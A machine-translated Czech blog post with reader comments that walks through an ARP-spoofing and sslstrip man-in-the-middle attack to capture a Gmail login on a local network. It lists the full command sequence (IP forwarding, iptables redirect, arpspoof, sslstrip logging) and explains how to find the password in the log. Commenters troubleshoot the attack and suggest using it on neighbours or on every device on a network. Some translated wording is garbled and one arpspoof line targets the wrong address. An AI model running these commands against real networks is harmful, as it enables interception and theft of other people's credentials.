Ahoj bloggeri.
Pro dnešek mám malý vzorek toho, jak nebezpečné může být připojení k jakékoli síti bez zabezpečení těch, které se nám tolik líbí.
Pro dnešek použiji ArpSpoofing s Sslstrip k získání hesla pro Gmail. Pro lepší kontrolu prostředí jsem vytvořil účet s názvem „testarp@gmail.com".
A protože se mi preambule moc nelíbí, pusťme se do toho.
ŽIVOTNÍ PROSTŘEDÍ
Pro tento test máme následující:
1. Útočník: Je to můj stolní nebo stolní počítač, který má Debian Wheezy. Z úložišť můžete nainstalovat sslstrip y dsniff mít harpspoofing
2. Oběť: Obětí je tablet Android, který chce vidět svou poštu pouze prostřednictvím prohlížeče.
3. Médium: Prostřední je moje Směrovač Cisco DPC2425
ADRESY.
Adresa útočníka: 172.26.0.2
Adresa routeru: 172.26.0.1
Adresa oběti: 172.26.0.8
ÚTOK:
První věcí, kterou pro tento útok uděláme, je aktivace předávání, aby náš počítač mohl předávat informace oběti, aniž by si toho všimla. (Jinak by to byl útok odmítnutí služeb)
K tomu použijeme:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Nyní, když uděláme tail -f desdelinux vidíme informace živě a přímo
Tak jak tedy dosáhneme toho, co chceme?
Nejprve zadejte svoji poštu na tabletu. Při přihlášení vidíme, že se na naší konzoli objevují tisíce a tisíce věcí.
Nyní, když je hotovo, otevřeme náš soubor “desdelinux“s nano
nano desdelinux
pomocí Control + W hledáme něco, čemu se říká SECURE POST.
A uvidíme něco takového.
Mezi touto obrovskou linií, kterou nelze vidět, je e-mail a heslo oběti.
Běháme tedy doprava, dokud konečně neuvidíme světlo na konci tunelu.
Při jiné příležitosti uvidíme, jak se můžeme před těmito útoky trochu chránit.
pozdravy
Využívám této příležitosti a říkám, že když byl příspěvek zveřejněn, příkazy nebyly správné.
Příkaz iptables na konci chybí 8080, který je na jiném řádku. A pak byly všechny příkazy arpspoof na stejném řádku. Každý příkaz je na jiném řádku.
Doufejme, že to editor uvidí a dokáže to opravit.
Zdravím.
Provedl jsem opravy, které zmiňuješ, je to v pořádku?
Pokud se chystáte vložit kód do preferované položky, použijte zobrazení HTML a před odesláním do čekání ověřte správnost článku. Děkuji.
Je mrazivé vědět, že ti z nás, kteří nemají znalosti, jsou tak zranitelní. Velmi dobrá informace, i když málo rozumím tématu, uvědomuji si důležitost. Děkuji!
pozdravy
Funguje to však pouze v případě, že útočník a oběť jsou ve stejné síti. V každém případě se mi zdá, že pokud se (ve stejné síti) připojíte pomocí HTTPS, nedojde k tomu, protože data jsou šifrována PŘED opuštěním vašeho počítače. Pokud se připojujete pomocí protokolu HTTP (bez S), myslím, že i při pohledu na síťový kabel vidíte klíče.
To není pravda. Hackuji heslo do Gmailu a pokud si všimnete, že Gmail používá https. Tak? Jde o to, že i když je https zabezpečený, záleží na http. Takže to není tak bezpečné.
Nepřiznávejte tolik o https, že S není pro Supermana, ale pro „bezpečné“
funguje s https nebo bez https, zkusil jsem to s více specializovaným linuxovým distro a funguje to bez problémů
Můžete jej přesně použít k tomu, abyste naučili lekci těm, kteří vám ukradnou Wi-Fi. 😀
Je to víceméně jako to, co už dávno řekli na blogu Chemy Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, skvělé, co to dělá! / A potom řeknou mému paranoidovi pokaždé, když použiji VPN, když si jdou zkontrolovat bankovní účet ...). Mimochodem, musíte vidět, jak jsou cyničtí lidé v komentářích ... pokud nakonec krade ...
Nyní musíme absolvovat výukový program, jak vytvořit a nabídnout vlastní službu VPN.
Příběh, který propojíte, je velmi zajímavý, dokonce se zdá hodný nové knihy, a díky tomu si pamatuji, když jsem použil internet mých sousedů, a přestože říkám, že předmět znám, myslím, že jsem nikdy neviděl skutečné rozměry nebezpečí, které jsem mohl mít naposledy, naštěstí pro mě, změnili pouze heslo na WPA2 a tam začal můj příběh s ISP haha
Proto název říká Sslstrip v akci.
Funguje to, pokud je útočník uprostřed
Na jaké vlně pracujete na hranolu? -.-
no.
Na co čekáte, než pošlete svůj požadavek XD
jde o
dobrý příspěvek
Zajímavé, později udělám vzdělávací test ... Možná bych mohl dokonce odstranit heslo k WiFi a trochu se pobavit 😛
Můžete náhodou udělat něco podobného, abyste poslali různé stránky na ty, které si cíl přál? Například chtějí otevřít Facebook a já je přesměruji na Google? 😛
Ano. Ale je to všechno velmi odlišná role.
Možná to zveřejním později.
velmi dobrý příspěvek, tato témata jsou velmi poučná, nyní musíme být schopni čelit tomuto útoku, protože někteří (jako já) se připojují k veřejným sítím (například univerzita), bylo by užitečné se mu vyhnout.
Zdravím!
Pro mě to nefungovalo 🙁
Něco mi zde selhává, kromě skutečnosti, že připojení https jsou šifrována pomocí certifikátu serveru (jakmile máte certifikát na svém počítači, šifrování má na starosti váš prohlížeč) s iptables přesměrováváte port 80 (http), ne 443 což je https
Také jsem si to myslel. Jde o to, že ačkoli je https „zabezpečený“, bohužel záleží na http. Takže sslstrip to využívá, dělá prohlížeč přesvědčen, že používá pověření https, ale není.
do prdele! ale prohlížeč by měl vidět varování jako „tento certifikát pochází z podezřelého webu nebo něco podobného“ ... určitě budu muset udělat testy XD
Ne, absolutně nic nevychází.
Nakonec to fungovalo pro mě
Jsem připojený k síti WEP s heslem a stejně mi to ukázalo heslo.
Dotaz. Můžete udělat stejný postup, ale pro všechny počítače připojené k síti, místo abyste měli jedinou oběť?
Ano můžeš. Ale neprovedl jsem experimenty. Zkuste to sami a řekněte nám, jak to chodí.
Jediná věc, kterou s tím dostanu, je, že stroj oběti přejde do režimu offline, ale sslstrip mi nic neukáže: /
Měli byste na chvíli deaktivovat bránu firewall. Nebo alespoň povolte příchozí připojení.
Sonda a já jsme viděli pouze uživatelské jméno a heslo stránky na facebooku, v gmailu jsem v logu nenašel žádný výsledek, také mi stačil řádek arpspoof «arpspoof -i -t«. Na druhou stranu stroj oběti nemohl otevřít některé stránky. Budu pokračovat ve vyšetřování, je to velmi zajímavé. Pomoc pro ty, kteří používají Manjaro, balíčky k instalaci jsou: dsniff (zde je arpspoff), twisted a python2-pyopenssl. Sslstrip lze stáhnout zde: http://www.thoughtcrime.org/software/sslstrip/
Chcete-li jej spustit $ python2 sslstrip.py
Zdravím.
Nevyšlo, ale řádek arpspoof je: #arpspoof -i int -t ip-oběť ip-router
podívej, dělám přesně to, co říkáš:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Problém je v tom, že oběť, což je další počítač, který mám tady ve svém pokoji, je ponechán bez připojení k bodu, kdy musím restartovat router, co mám dělat, pomoci mi.
Další věc, pracuji s virtuálním strojem, a když spustím příkaz iwconfig, wlan0 se neobjeví, ani když spustím ifconfig, ale pokud mám na svém virtuálním stroji internet, co s rozhraním eth0.